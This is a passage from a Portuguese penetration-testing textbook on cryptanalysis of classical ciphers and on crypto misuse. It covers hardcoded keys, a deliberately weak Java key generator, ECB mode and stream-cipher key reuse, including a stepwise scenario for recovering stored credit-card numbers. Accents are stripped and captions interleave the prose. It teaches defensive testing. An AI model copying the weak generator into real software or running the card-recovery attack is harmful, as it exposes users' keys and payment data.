corresponde a uma letra similarmente frequente do alfabeto original.
Por exemplo, em um texto em ingls, se Z a letra cifrada com maior nmero de ocorrncias, h uma grande probabilidade de que seja o mapeamento da letra e.
Para facilitar a compreenso da tcnica de al-Kind, o texto cifrado apresentado na Figura 9.19
ser minuciosamente criptoanalisado. Considere-se que a mensagem original foi redigida
na lngua inglesa e que uma cifra de substituio simples foi empregada para proteg-la. Um
forte indicativo de que a ltima premissa est correta o ndice de coincidncia igual a 0,0723,
que revela uma alta redundncia no texto cifrado. Por outro lado, se ele fosse a nica ferramenta utilizada para identificar a lngua original, a principal candidata teria sido o espanhol,
em vez do ingls. Isso ocorre porque o IC um indicador estatstico, com valores muito prximos para os diversos idiomas, o que faz com que no seja uma tcnica precisa para alcanar
esse propsito.
DSFY CQLGRBGJOFUT XJTG SJY IQBG YQXSFYDFCJDGL GAGIGUDY JD DSG RQDDQI
QP DSG XJTG PQB GZJIXAG MQW CJU JAYQ GZJIFUG DSG PBGHWGUCM QP XJFBGL
Figura 9.19
Texto cifrado com cifra monoalfabtica.
AGDDGBY JUL CQIXJBG DSGI DQ DSG PBGHWGUCM QP XJFBGL AGDDGBY FU

GUTAFYS QB MQW CJU AQQO JD BGXGJDGL AGDDGBY QB DSG EQVGA DBQVGA
A primeira tarefa que deve ser realizada calcular as frequncias individuais de cada
smbolo no texto cifrado e compar-las com a estrutura da lngua inglesa. O resultado,
apresentado na Figura 9.20, mostra que as trs letras mais comuns no texto so G, D e
Q, em ordem decrescente de percentual de ocorrncias. Estatisticamente, a partir da
ltima linha do grfico, conclui-se que elas so os mapeamentos de e, t e a, respectivamente. Desse modo, deve-se proceder substituio de G por e, D por t e Q por a,
conforme ilustrado na Figura 9.21, a qual est dividida em tabela de mapeamento de
deciframento, texto em claro parcial e texto cifrado.
Figura 9.20
Frequncias individuais das letras
do texto cifrado
comparadas com as
da lngua inglesa.
431
Figura 9.21
Anlise de frequncias (1/11) - substituio de G, D e
Q por e, t e a,
respectivamente.
Observem-se as partes marcadas em vermelho na figura acima. Tudo indica que t*e
corresponde palavra the e, portanto, todas as ocorrncias de S, no texto cifrado, devem
ser substitudas pela letra h (vide Figura 9.22). Um problema destacado por esta ilustrao
a palavra ta, circundada no quadro, a qual no usual na lngua inglesa. Como a letra t
parece ter sido corretamente mapeada, uma vez que ela faz parte do texto legvel recuperado, a troca de Q por a foi aparentemente equivocada. Assim, essa substituio deve ser
cancelada, obtendo-se o exposto na Figura 9.23.
Figura 9.22
Anlise de frequncias (2/11); substituio de S por h.
432
Figura 9.23
Anlise de frequncias (3/11);
cancelamento da
substituio de
Q por a.
Considerando-se que o mapeamento de Q por a no foi acertado, deve-se escolher outra

letra candidata. A partir de t*, fcil inferir que o melhor substituto para Q a letra o.
Uma evidncia adicional para confirmar esta hiptese que a letra com frequncia mais
prxima de Q, que no o a, justamente a letra o (vide Figura 9.20). Efetuando-se esta
troca, alcana-se a situao exibida na Figura 9.24.
Dando continuidade atividade, a sequncia o*, marcada em vermelho na figura nos d
as opes of, on e or como possveis textos originais. Para decidir qual a melhor delas,
deve-se comparar a frequncia de P, no texto cifrado, com as de f, n e r, no padro da
lngua inglesa, e determinar qual a mais prxima. No presente exemplo, feita esta anlise,
conclui-se que f a contraparte legvel de P. Considerando-se que esta hiptese esteja
correta, a sequncia PQB vira fo*, a qual, facilmente, pode ser traduzida para for. Esta
nova relao reforada pela presena de QB no texto cifrado, cujo deciframento resulta na
palavra vlida or. A Figura 9.25 reflete as alteraes decorrentes dessas ltimas substituies.
Figura 9.25
Anlise de frequncias (5/11) - substituio de P por f
e de B por r.
Vamos agora focar a ateno na sequncia *t, que pode ser substituda por it e at. Para
definir a palavra mais provvel, repetimos o procedimento de anlise das frequncias e
encontramos que J, com 8%, est mais prximo de a, com 8,2%, do que de i, com 7,0%.
Aps a troca dos Js por as, atinge-se a situao ilustrada na Figura 9.26, na qual esto
ressaltadas as palavras parciais a** e *a*, que correspondem, respectivamente, a JUL e
CJU. Para a primeira, possvel pensar em and e are, mas esta descartada porque r e
e so letras do alfabeto original j mapeadas. Supondo que as trocas de U por n e de L
por d estejam corretas, CJU torna-se *an, que pode ser man ou can. Novamente, pela
Figura 9.24
Anlise de frequncias (4/11) - substituio de Q por o.
tabela de ocorrncias, opta-se pelo mapeamento de C para c.

433
Figura 9.26
Anlise de frequncias (6/11) - substituio de J por a.
Figura 9.27
Anlise de frequncias (7/11) - substituio de C, L e
U por c, d e n,
respectivamente.
Na Figura 9.27, possvel realizar as substituies X g p, Y g s e I g m, resultando

nas palavras repeated, has, more, compare e them. Em seguida (Figura 9.28), as
palavras this, page, sophisticated, elements, also, paired, in, letters e english
podem ser identificadas, como consequncia dos mapeamentos F g i, T g g e A g l.
Note-se que neste estgio (Figura 9.29) o texto em claro quase que completamente inteligvel, e palavras adicionais podem ser enumeradas, como bottom, example, you,
examine e frequency. Para isso, as substituies R g b, Z g x, H g q, W g u e
M g y devem ser efetuadas. Finalmente, a partir da Figura 9.30, basta trocar O por k,
E por v e V por W, para completarmos o texto legvel, representado integralmente na
Figura 9.31.
434
Figura 9.28
Anlise de frequncias (8/11) - substituio de X, Y e
I por p, s, e m,
respectivamente.
Figura 9.29
Anlise de frequncias (9/11) - substituio de F, T e
A por i, g e l,
respectivamente.
Figura 9.30
Anlise de frequncias (10/11) - substituio de R, Z,
H, W e M por
b, x, q, u e y,
respectivamente.
Cifra de Vigenre
A cifra de Vigenre um algoritmo de substituio polialfabtico que utiliza, ciclica-
mente, t mapeamentos da cifra de deslocamento, especificados por uma chave K = k1k2 ...
k t. Pode-se imaginar que o ciframento opera sobre grupos de t letras, de modo que cada
posio da chave descreve a transformao que deve ocorrer na posio correspondente de cada grupo.
Em outras palavras, k1 afeta o primeiro elemento de todos os grupos, k2, o segundo, e assim
por diante. Graas a isso, um smbolo que se repete no texto em claro pode ser mapeado
para smbolos diferentes no texto cifrado, se cada instncia for protegida por um ki distinto.
Como na poca em que era utilizado, o algoritmo era executado manualmente, as pessoas
Figura 9.31
Anlise de frequncias (11/11) - texto
original recuperado
(Simon Singh).
se apoiavam na Tabela de Vigenre, representada na Figura 9.32, para auxiliar nos processos
435
de ciframento e de deciframento. Por exemplo, para cifrar a letra g com a subchave U,

basta selecionar o caractere presente na interseco da linha iniciada com U com a coluna
g, ou seja, a letra A. Analogamente, para decifrar V com a subchave H, deve-se percorrer a linha H at encontrar a letra V e selecionar o smbolo que est na primeira linha
da mesma coluna, isto , o caractere o.
Para um exemplo completo, considere-se o ciframento do texto outro porto longe daqui
com a chave PENTEST, de sete caracteres de comprimento. A primeira letra da mensagem
mapeada de acordo com a linha da tabela de Vigenre que inicia com a letra P. Esta
mesma transformao aplicada a todo caractere que esteja a uma distncia mltipla do
tamanho da chave (no caso, sete) do primeiro elemento. Isto equivalente a dividir o texto
legvel em blocos de tamanho sete e aplicar o mapeamento descrito pela primeira letra da
chave primeira posio de cada bloco. O processo de ciframento com as demais letras da
chave realizado de maneira similar, resultando no texto cifrado exibido na Figura 9.33.
H dois aspectos muito importantes que devem ser observados nesse exemplo, que auxi-
436
liaro na criptoanlise de mensagens protegidas com o algoritmo.

O primeiro deles que os smbolos do texto cifrado, que ocupam a mesma posio nos
diversos blocos, constituem a sada de uma cifra monoalfabtica, uma vez que foram
todos cifrados com chave idntica.
Consequentemente, esto sujeitos criptoanlise por meio de anlise de frequncias, ou por busca exaustiva de chaves, por se tratar de uma cifra de deslocamento. O
segundo ponto relevante que a frequncia das letras no texto em claro diluda no
texto cifrado e, por isso, o ndice de coincidncia tende a se aproximar de IC A .
Figura 9.32
Tabela de Vigenre.
Note-se, por exemplo, que na Figura 9.33, a letra o mapeada para D, S, H e B.

Como a chave escolhida utiliza cinco letras distintas, qualquer letra do texto em claro
pode ser cifrada, no mximo, de cinco maneiras diferentes.
Chave
Texto em claro
Texto cifrado
Figura 9.33
Exemplo de uso da
cifra de Vigenre.
O mtodo utilizado para quebrar a cifra de Vigenre, que ser descrito a seguir, foi
introduzido por Charles Babbage, gnio ingls que nasceu no final do sculo XVIII e
considerado o pai do primeiro computador da histria (Singh, 1999). Parte da tcnica,
tambm atribuda a Kasiski, est contida na explicao do pargrafo anterior e consiste
em se analisar separadamente cada uma das cifras de deslocamento utilizadas, com um
dos mtodos j conhecidos.
Para que isso possa ser realizado, porm, falta saber o tamanho da chave empregada, sem o
qual, no possvel delimitar os grupos de letras que foram cifrados com a mesma subchave.
Imagine-se que um texto de tamanho razovel, contendo vrias ocorrncias da palavra
ano, seja cifrado com a chave CASA. Caso instncias diferentes de ano sejam
cifradas com a mesma parte da chave, os resultados sero idnticos.
Note-se que o nmero de maneiras diferentes pelo qual uma palavra pode ser cifrada por
Vigenre exatamente o tamanho da chave, que neste caso quatro. Por consequncia, se
houver mais de cinco ocorrncias de ano, certamente, haver repetio de um dos possveis textos cifrados para essa palavra (CNG, AFO, SNQ e APO).
Desconsiderando o fator coincidncia, a distncia entre sequncias idnticas de sm-
bolos cifrados , necessariamente, mltipla do tamanho da chave, conforme ilustrado na

Figura 9.34. Para calcular os comprimentos candidatos, a partir da distncia, preciso
fatorar o valor em nmeros primos e combin-los de todos os jeitos possveis.
No exemplo abaixo, o nmero de posies entre as repeties 24, que igual a 2 3 x 3,
na forma fatorada. Agrupando os primos encontrados, obtm-se os valores: 2, 3, 2 2 = 4,
2 x 3 = 6, 2 3 = 8, 22 x 3 = 12 e 2 3 x 3 = 24.
A estratgia, ento, seguir esse mesmo processo, para todas as repeties encontradas no texto cifrado, e verificar o tamanho mais comum.
Conseguida essa informao, basta executar a anlise de frequncias sobre a sequncia de
caracteres gerada para cada posio da chave, e finalizar a criptoanlise.
A melhor maneira de compreender a tcnica de Babbage realizar um exerccio de quebra
Figura 9.34
Tamanhos de chave
possveis calculados
pela distncia
entre as ocorrncias
de APO.
de um texto protegido pelo algoritmo de Vigenre. A partir do texto cifrado exibido na
437
Figura 9.35, cujo original est em ingls, o primeiro passo determinar o tipo de cifra que foi
utilizada na proteo da mensagem. Calculando-se o ndice de coincidncia, obtm-se o
valor 0,0397, o qual, por ser muito prximo de IC A (conforme esperado), indica que uma cifra
polialfabtica foi empregada. Supondo que esta seja a cifra de Vigenre, o prximo passo
determinar o tamanho da chave escolhida. Para isso, precisamos encontrar todas as
repeties de sequncias de letras, calcular a distncia entre as ocorrncias, e determinar os
comprimentos de chave possveis, a partir da fatorao do valor encontrado. O resultado
desta etapa est ilustrado na Figura 206.
BHGVSZGJQPHAOMTSHGNZZNFBCJVQZAZTVQYLTJMQNNKASNNIBZZCJMDYOCEZSDGZQZLNQQJSKHPUIEBFWEQNLGEIOLWMCVEMEDMRLATPTRSGTQBAUAEFNFQYLOPICFIUMOULCBQTROQYFCQZYJRQNEMEUBFIIQPPBAUIHNZGVPIONLXFNYQE-
Figura 9.35
Texto cifrado
com o algoritmo
de Vigenre.
MAHINJLKSPBRKVVQEFXLWCJUPSTCVOFMQAEUIVMZZSGFAWEUATTNQDPWHKADMOWTOJRUELXFNCYLAEWLWSGJCTWPKWTAMIWQTGICXAPLEFTVMCXHKAEMIESMTOVAHJRGXLYCJMOFNFKZGBNMOFNFETYHQVPMAPLSJLGIYYOPICTUIPDYIESH-
MINMHNTJBSJOVPPWHGPPQDQCEMIUJLYTGZPIHCBQTRCTXX
438
Figura 9.36
Sequncias de
caracteres repetidas encontradas
no texto cifrado e
possveis tamanhos
de chave.
fcil observar, na tabela de repeties, que o tamanho mais provvel de chave cinco, pois
a coluna que possui quase todas as linhas marcadas. Somente as ocorrncias de LXF,
XFN e LXFN, pertencentes mesma sequncia, no esto separadas por uma distncia
mltipla de cinco, indicando uma provvel coincidncia, que no invalida a hiptese original.
A partir do tamanho encontrado, necessrio trabalhar sobre cinco cifras de deslocamento
distintas, cujos agrupamentos de letras so definidos pelas posies em cada bloco de cinco
elementos. Desse modo, todos os smbolos que ocupam a primeira posio formam um
grupo; todos na segunda, outro, e assim por diante, at os elementos da quinta posio.
A Figura 9.37 mostra o grupo formado pelos elementos que esto na primeira posio de cada
bloco. Ao realizar a anlise de frequncias sobre essas letras e compar-las com a frequncia
da lngua inglesa, obtm-se os histogramas apresentados na Figura 9.38(a). Lembre-se de que
a cifra de deslocamento, simplesmente, rotaciona o alfabeto em k posies. Com isso, a transformao que causa no texto faz com que as frequncias individuais das letras sejam transferidas para outras, como esperado, mas respeitando-se a ordem que ocupam no alfabeto.
Graficamente, isto implica que o histograma do texto em claro rotacionado o mesmo nmero
de posies que o alfabeto. Considerando que, estatisticamente, a distribuio das letras originais deve ser semelhante do idioma, basta alinhar os histogramas para revelar o mapeamento
utilizado. Uma dica para a lngua inglesa basear a tarefa nos picos das letras A e E, que costumam se destacar das demais. A Figura 9.38(b) ilustra o alinhamento realizado para o exemplo
em estudo, o qual, aplicado Figura 9.37, resulta no texto decifrado da Figura 9.39.
A aplicao desses passos para a segunda posio apresentada na Figura 9.40 at a
Figura 9.42. Note-se que os histogramas j esto alinhados e, portanto, nada precisa ser
feito. Para a terceira posio, analisada na Figura 9.43 at a Figura 9.45, a letra de maior frequncia no texto cifrado a G, o que a faz a principal candidata para a letra e. Ocupando
este mesmo papel, no grupo de smbolos da quarta posio, est a letra M, conforme
ilustrado na Figura 9.47(a). Ajustando os histogramas e realizando as devidas substituies,
obtm-se o texto da Figura 9.48, no qual j possvel identificar algumas palavras, como
when e came. A etapa final, referente ao ltimo mapeamento, baseia-se nos picos das
letras L e P e exibida na Figura 9.49 Figura 9.51. Do processo inteiro, conclui-se que a
chave empregada para a proteo do texto FACIL.
Figura 9.37
Grupo formado
pelos caracteres
que ocupam a
primeira posio
de cada bloco.
439
(a)
(b)
Figura 9.38
Anlise de
frequncias do
grupo formado
pelos elementos
que ocupam a
primeira posio
nos blocos: (a)
Histogramas
originais. (b)
Histograma da
primeira posio
alinhado ao do
idioma.
Figura 9.39
Substituio
dos smbolos
da primeira
posio, segundo
mapeamento
ilustrado na
Figura 9.38(b).
Figura 9.40
Grupo formado
pelos caracteres
que ocupam a
segunda posio de
cada bloco.
Figura 9.41
Anlise de
frequncias do
grupo formado
pelos elementos
que ocupam a
segunda posio
nos blocos: (a)
Histogramas
originais. (b)
Histograma da
segunda posio
alinhado ao
do idioma.
440
(a)
(b)
Figura 9.42
Substituio
dos smbolos da
segunda posio,
segundo mapeamento ilustrado na
Figura 9.41(b).
Figura 9.43
Grupo formado pelos caracteres que
ocupam a terceira
posio de
cada bloco.
Figura 9.44
Anlise de
frequncias do
grupo formado
pelos elementos
que ocupam a
terceira posio
nos blocos: (a)
Histogramas
originais. (b)
Histograma da
terceira posio
alinhado ao do
idioma.
(a)
(b)
(a)
(b)
Figura 9.45
Substituio dos
smbolos da terceira
posio, segundo
mapeamento ilustrado na
Figura 9.44(b).
Figura 9.47
Anlise de
frequncias do
grupo formado
pelos elementos
que ocupam a
quarta posio
nos blocos: (a)
Histogramas
originais. (b)
Histograma da
quarta posio
alinhado ao
do idioma.
Figura 9.46
Grupo formado
pelos caracteres
que ocupam a
quarta posio de
cada bloco.
441
Figura 9.48
Substituio dos
smbolos da quarta
posio, segundo
mapeamento ilustrado na
Figura 9.47(b).
Figura 9.49
Grupo formado
pelos caracteres
que ocupam a
quinta posio de
cada bloco.
Figura 9.50
Anlise de
frequncias do
grupo formado
pelos elementos
que ocupam a
quinta posio
nos blocos: (a)
Histogramas
originais. (b)
Histograma da
quinta posio
alinhado ao
do idioma.
(a)
(b)
Roteiro geral de teste
Quando no processo de teste de invaso for encontrada informao inelegvel, porm

cifra clssica. O seguinte roteiro pode servir de base para a tarefa:
1. Calcule o ndice de coincidncia do texto cifrado.
2. Se o ndice for prximo aos de um idioma, h muita redundncia no texto, o que um
indicativo de que uma cifra de substituio simples foi empregada:

2.1.Realize busca exaustiva de chaves contra a cifra de deslocamento.
2.2.Se no for bem-sucedido no passo anterior, aplique a tcnica de anlise de frequncias.
3. Seno, se o ndice de coincidncia for prximo a IC A , uma cifra polialfabtica foi utilizada:
3.1.Aplique o mtodo de Babbage para quebra da cifra de Vigenre.
442
textual, deve-se tentar criptoanalis-la, sob a premissa de ter sido protegida por uma
Figura 9.51
Substituio dos
smbolos da quinta
posio, segundo
mapeamento
ilustrado na Figura
9.50(b), e incluso
de espaos para
separao de
palavras. O texto
recuperado
um trecho da
estria The Model
Millionaire de
Oscar Wilde.
Chave criptogrfica
Voc j embutiu uma chave criptogrfica em algum programa ou script que tenha desenvolvido?
Recuperao de chaves embutidas em cdigo

Imagine-se uma chave criptogrfica embutida diretamente no cdigo, conforme ilustrado
a seguir:
#include <stdio.h>
int main() {
char key[] = 0a3bc178940fd43047027cda807409af;
...
printf(Cifrando dados. Aguarde...\n);
...
}
Considere-se que o programa compilado, gerando o binrio cifra, e, por esta razo, o
desenvolvedor, inocentemente, julga que a chave est protegida de acessos ilegtimos.

O usurio mal intencionado, ao obter o programa, executa imediatamente o comando
strings do Linux sobre o binrio, gerando a sada:
/lib/ld-linux.so.2
#IB
_ _gmon_start_ _
libc.so.6
_IO_stdin_used
puts
GLIBC_2.0
PTRh
0a3b
c178
940f
d430
_ _libc_start_main
4702
443
7cda
8074
09af
[^_]
Cifrando dados. Aguarde...
Pronto! A chave aparece na lista de cadeia de caracteres do programa, agrupada de
quatro em quatro dgitos hexadecimais.

Este exemplo ilustra um caso simples de extrao de chaves, no qual nenhum mecanismo
sequer foi utilizado para proteg-la. Mesmo que isto ocorresse, a prtica de embutir
segredos no cdigo no recomendvel, pois, cedo ou tarde, uma pessoa habilidosa consegue realizar a engenharia reversa e obter a informao desejada.
Gerao de chaves com baixa entropia

Boas chaves criptogrficas devem ser geradas por processos que forneam o mximo de
aleatoriedade possvel, impedindo, assim, que um adversrio seja capaz de descobri-las

por mtodos determinsticos.
Em outras palavras, a utilizao de uma chave de n bits, criada dessa maneira, implica que,
por adivinhao, a chance de um palpite qualquer ser correto de 1/2n. Considerando
chaves de 128 bits, tamanho comum utilizado atualmente, mais fcil uma pessoa acertar
diversas vezes na loteria do que recuperar a chave certa por meio de escolhas aleatrias.
Na prtica, porm, nem sempre mtodos eficazes so utilizados na gerao de chaves,
o que resulta em valores com baixa entropia. Exemplos de problemas encontrados com
frequncia neste contexto esto enumerados a seguir:
1 Chaves fixas e com valores previsveis, como 0x00000000..., 0x11111111...,

0x0123456789... etc.
1 Utilizao de geradores de nmeros pseudo-aleatrios fracos, como os implementados pela classe Random, em Java, e pela funo rand(), em C.
1 Escolha de valores a partir de um pequeno subconjunto do domnio de chaves.

1 Uso de sementes previsveis em geradores de nmeros pseudo-aleatrios.
1 Inicializao de geradores de nmeros pseudo-aleatrios com sementes de poucos
bits, o que permite um ataque de busca exaustiva para descoberta do valor correto.
1 Reutilizao integral ou parcial de chaves criptogrficas.

Considere-se que em um teste de invaso, o seguinte cdigo Java tenha sido obtido, em um
dos diretrios do servidor. Ao que tudo indica, ele utilizado na gerao de chaves criptogrficas de comprimento arbitrrio. Com base no exposto, que problemas ele possui?
01 import java.util.Random;
02
03 public class GeraChave {
04
444
private static Random random = new Random();
05
06
public static byte[] geraChave(int numBits) {
07
int numBytes = numBits / 8;
08
byte chave[] = new byte[numBytes];
09
10
// Atribui a cada byte da chave um valor
11
// inteiro j, tal que 0 <= j <= 9
12
for (int i = 0; i < numBytes; i++) {
13
chave[i] = (byte)random.nextInt(10);
14
15
return chave;
16
17 }
Logo na primeira linha, percebe-se que o programa utiliza a classe Random, a qual,
se sabe, no implementa um gerador criptogrfico de nmeros pseudo-aleatrios. O
uso dela pode ser observado nas linhas 04 e 13, responsveis, respectivamente, pela
criao de um objeto Random e pela atribuio de um valor inteiro entre 0 e 9 i-sima
posio do vetor chave. Este passo apresenta um problema adicional, relacionado
cardinalidade do conjunto a partir do qual a chave selecionada. Uma chave de 128 bits,
por exemplo, corresponde a 16 bytes e, pelo programa, cada posio recebe um valor
dentre 10 possveis. Desse modo, o total de chaves diferentes que podem ser geradas
National Institute
of Standards and
Technology
uma agncia do
Departamento de
Comrcio dos Estados
Unidos, fundada em
1901, com o objetivo de
promover a inovao
e competitividade
industrial, por meio da
definio de padres
tecnolgicos para as
mais diversas reas.
de 1016 = 10.000.000.000.000.000. Este nmero apenas uma nfima parcela do espao

fornecido por 128 bits, cujo total de elementos 2128 = 340.282.366.920.938.463.463.374.
607.431.768.211.456. Consequentemente, um ataque de busca exaustiva de chaves neste
cenrio possui um custo muito menor que o terico.
Emprego de modo de operao inadequado

Como vimos, cifras de bloco dividem o texto em claro em blocos de tamanho fixo e
aplicam a mesma transformao, parametrizada pela chave, a cada um deles. Modos de

operao definem a maneira como esses blocos so encadeados no processo de ciframento da mensagem inteira.
Existem diversos modos, como os especificados no documento NIST SP800-38A (Dworking,
2001), e todos eles apresentam especificidades, que devem ser consideradas em uma
soluo para evitar a introduo de vulnerabilidades no sistema. Neste texto, focaremos
apenas os modos ECB e CBC, comparando as respectivas propriedades e como devem ser
adequadamente utilizados.
O modo Electronic Code Book (ECB) o mais simples existente e consiste em cifrar cada
bloco de texto em claro individualmente com a mesma chave.
NIST
445
A Figura 9.52 ilustra o processo de ciframento, em modo ECB, de uma mensagem m contendo t blocos de n bits. O processo de deciframento, que similar, est representado na
Figura 9.53. Nas ilustraes, E, E -1, K e c denotam, respectivamente, a funo de ciframento, a
funo de deciframento, a chave empregada e a mensagem cifrada.
Este modo possui as seguintes propriedades (Menezes et al., 2001):
1 Blocos em claro idnticos geram o mesmo bloco cifrado, quando a mesma chave
utilizada.
1 No h encadeamento entre os blocos, que so cifrados individualmente.

1 O erro em um bloco no afeta o deciframento dos demais.
Figura 9.52
Modo de operao
ECB - Ciframento.
Figura 9.53
Modo de operao
ECB - Deciframento.
A primeira propriedade implica que o modo ECB no deve ser utilizado quando a men-
sagem a ser protegida maior que o tamanho do bloco da cifra empregada. Quando isto
violado, o texto cifrado revela informaes sobre a mensagem original, as quais podem
ser suficientes para o objetivo do atacante ou auxiliar no processo de criptoanlise.
Por exemplo, considere-se a Figura 9.54 a imagem esquerda o contedo de um arquivo
em formato BMP, cujo ciframento, em modo ECB, resulta na figura da direita. Note-se que,
446
embora as cores no sejam nada parecidas, a informao carregada pela imagem original
est presente na segunda. Se esta fosse uma foto pornogrfica apreendida em um computador corporativo, saber o real contedo dela, mesmo com cores distorcidas, seria suficiente
para aplicar uma punio ao colaborador.
Figura 9.54
A imagem direita
o resultado do
ciframento, em
modo ECB,
da outra.
Pode-se dizer que uma cifra operando em modo ECB uma cifra de substituio simples, mas
baseada em um alfabeto muito maior que o romano. Dessa maneira, o texto cifrado mantm
a redundncia da mensagem original, o que pode ser facilmente verificado por um teste
que verifica o quanto a informao pode ser compactada. Nveis de compactao maiores
implicam que h muita repetio de valores na mensagem de entrada, o que um bom indicativo de que um modo de operao inadequado foi utilizado. A razo para isso que um texto
cifrado devidamente gerado deve ser indistinguvel de uma sequncia aleatria de valores.
No exemplo acima, foi possvel compactar a figura cifrada a 3,7% do tamanho original.
O modo Cipher Block Chaining (CBC) pode ser empregado para suprir a deficincia do
modo ECB na proteo de mensagens longas.

A ideia desse modo combinar, por meio do operador XOR, o ltimo bloco cifrado com o
bloco de texto em claro atual, antes de aplicar a funo de ciframento. Isto tem por objetivo alterar blocos em claro idnticos, de modo que entradas diferentes sejam fornecidas
para a cifra utilizada.
O funcionamento do CBC est ilustrado na Figura 9.55 e Figura 9.56. Perceba-se que, para
cifrar m1, no h um bloco cifrado anterior e, assim, um valor inicial, chamado de IV, deve ser
fornecido. Embora no seja necessrio manter o sigilo do IV, a integridade dele fundamental para decifrar corretamente o primeiro bloco.
Segundo Menezes et al. (2001), o modo CBC apresenta as seguintes propriedades:
1 Textos em claro idnticos resultam em textos cifrados iguais, quando mesmos IV
e chave so utilizados no ciframento. Considerando-se apenas blocos idnticos,

necessrio que os respectivos blocos cifrados anteriores sejam iguais, para que os
resultados tambm coincidam.
1 Cada bloco cifrado cj depende de mj e de todos os blocos anteriores (m1 a mj-1), que so
afeta o processo de deciframento.
1 Um erro em um bloco cj afeta apenas o deciframento dele mesmo e do bloco seguinte.

1 O modo CBC se recupera automaticamente de erros em um bloco cifrado cj , a partir
do bloco cj+2.
consolidados em cj-1. Por este motivo, uma alterao na ordem dos blocos cifrados
447
Figura 9.55
Modo de operao
CBC - Ciframento.
Figura 9.56Figura
9.56 Modo de
operao CBC Deciframento.
Figura 9.57
Ciframento em
modo CBC da
imagem ilustrada na
Figura 224.
A Figura 9.57 apresenta o resultado do ciframento da Figura 224, em modo de operao
448
CBC, para ilustrar como ele dilui eventuais padres encontrados no texto em claro. Note-se
que no h nenhuma relao visvel entre a imagem original e a cifrada, que mais parece um
canal de TV no sintonizado. Por meio desse exemplo, fica claro que mensagens maiores
que o tamanho do bloco utilizado pelo criptossistema devem ser cifradas com o modo CBC,
em vez do ECB.
ECB
Por que o modo de operao ECB no adequado para mensagens com tamanho maior que
o tamanho do bloco da cifra utilizada?
Uso incorreto de algoritmos criptogrficos

Infelizmente comum encontrar solues que empregam algoritmos criptogrficos fortes,
mas da maneira incorreta, conduzindo a vulnerabilidades simples de serem exploradas.

Nesta seo, sero examinados os casos de repetio de chaves em cifras de fluxo e uso de
primitiva criptogrfica incorreta para satisfazer a um requisito de segurana da informao.
Cifras de fluxo
Cifras de fluxo aditivas e binrias so cifras sncronas, isto , geram o fluxo de chaves
independentemente dos textos em claro e cifrado. Alm disso, conforme ilustrado na

Figura 9.58, elas operam diretamente com bits e utilizam o operador XOR, para combinar
a entrada com o fluxo de chaves. Como ele gerado em funo apenas da chave inicial,
quando esta repetida, o mesmo fluxo obtido.
Isto necessrio para o processo de deciframento, mas conduz a uma vulnerabilidade
quando textos diferentes so cifrados com a mesma chave.
(b) Deciframento
Gerador de uxo
de chaves
Gerador de uxo
de chaves
zi
m
zi
ci
mi
Antes de explicar o problema, necessrio relembrar algumas propriedades do operador XOR:
1 Comutatividade: a b = b a.
1 Associatividade: (a b) c = a (b c).
1 Elemento neutro: a 0 = a.
1 Elemento inverso: a a = 0.
Com esses conceitos em mente, observe-se, agora, como o uso de uma mesma chave,
em cifras de fluxo aditivas e binrias, pode comprometer a segurana das informaes:
1 Diversas mensagens m1 , m2 , ..., mn , de mesmo tamanho, so cifradas, individualmente, com

uma mesma chave K, o que implica que o fluxo de chaves z o mesmo para todas elas.
1 Do ciframento da mensagem mi, resulta ci = mi z.
1 Calculando o XOR de duas mensagens cifradas, possvel cancelar a ao do fluxo de
Figura 9.58
Modelo geral de
cifras de fluxo aditivas e binrias.
(a) Ciframento
chaves e obter o XOR dos textos em claro correspondentes:

449
1 c1 c2 = (m1 z) (m2 z) = m1 m2 z z = m1 m2 0 = m1 m2
A partir disso, possvel realizar uma anlise estatstica, com base na redundncia do
idioma, para recuperar as mensagens originais.
1 Um ataque mais poderoso possvel quando se conhece o texto em claro mi correspondente a um texto cifrado ci , pois isto permite a recuperao do fluxo de chaves z,
o qual basta para decifrar todas as mensagens protegidas com a mesma chave K:
1 ci mi = (mi z) mi = mi mi z = 0 z = z
Um cenrio de ataque possvel, explorando este problema, descrito a seguir, no escopo de

uma aplicao de comrcio eletrnico:
1.
Um usurio malicioso descobre que possvel realizar a cpia integral da base de dados
do sistema, por meio de uma vulnerabilidade em um dos campos da interface.
2. Em uma das tabelas, ele identifica nmeros de carto de crdito protegidos por uma cifra
de fluxo aditiva e binria.

3. O atacante realiza uma compra na loja virtual, com carto prprio, para conseguir o texto
em claro de um valor cifrado.

4. O novo registro recuperado da base de dados, explorando a mesma vulnerabilidade.
5. Para recuperar o fluxo de chaves, calculado o XOR do nmero de carto conhecido e o
texto cifrado correspondente.

6. Todos os nmeros de carto so recuperados pelo usurio malicioso, combinando o
fluxo de chaves obtido no passo anterior com cada texto cifrado da base de dados.
Uso de primitiva inadequada

O caso clssico de uso de primitiva criptogrfica inadequada para satisfazer um requisito
de segurana ocorreu no episdio envolvendo a comunicao cifrada entre Mary, rainha

dos escoceses, e os comparsas que buscavam assassinar a rainha Elizabeth (Singh, 1999).
Todas as mensagens trocadas entre eles eram transportadas por um agente duplo, que as
entregava, tambm, para Sir Walsingham, responsvel pela segurana da rainha. Um dos
empregados dele, Thomas Phelippes, era um dos melhores criptoanalistas da Europa e decifrava cada mensagem recebida de seu chefe, relativa conspirao supracitada.
Uma delas, enviada por Babbington, propunha levar adiante o plano de assassinato da
rainha, para libertar Mary e torn-la a nova monarca da Inglaterra. Ao saber disso, Walsingham esperou uma resposta de Mary, para poder incrimin-la, e adicionou ao final da carta
um texto forjado, solicitando os nomes das seis pessoas que executariam o plano. Sem a
menor ideia de que o texto no era autntico, Babbington forneceu os nomes das pessoas
em nova carta cifrada, a qual permitiu captur-los e conden-los morte.
O grande erro, do ponto de vista de criptografia, foi a ignorncia de que cifras no
satisfazem o requisito de autenticidade da origem da mensagem! Outro exemplo de uso
incorreto de primitiva criptogrfica dado por Menezes et al. (2001). Imagine-se que
Alice e Beto trocam mensagens, usando um formato particular, no qual os primeiros bits
representam uma quantia de dinheiro. Para evitar que um usurio malicioso obtenha ou
altere a mensagem original, eles empregam uma cifra de fluxo, com chaves descartveis.
Um atacante que consiga alterar as informaes em trnsito pode, simplesmente, mudar
os primeiros bits de cada mensagem, adulterando o valor monetrio informado.
450
Embora isto no permita saber o valor original, possibilita quebrar o requisito de integridade
que se esperava satisfazer com a soluo. Novamente, o problema resulta de uma premissa
incorreta quanto ao uso de uma cifra.
Mistura de algoritmos com nveis de segurana diferentes

A analogia da corrente se encaixa perfeitamente no escopo de solues que empregam
diversos mecanismos criptogrficos de diferentes classes.
Assim como a resistncia da corrente dada pela fora do elo mais fraco, a segurana
de mecanismos que envolvem criptografia determinada pelo algoritmo menos robusto

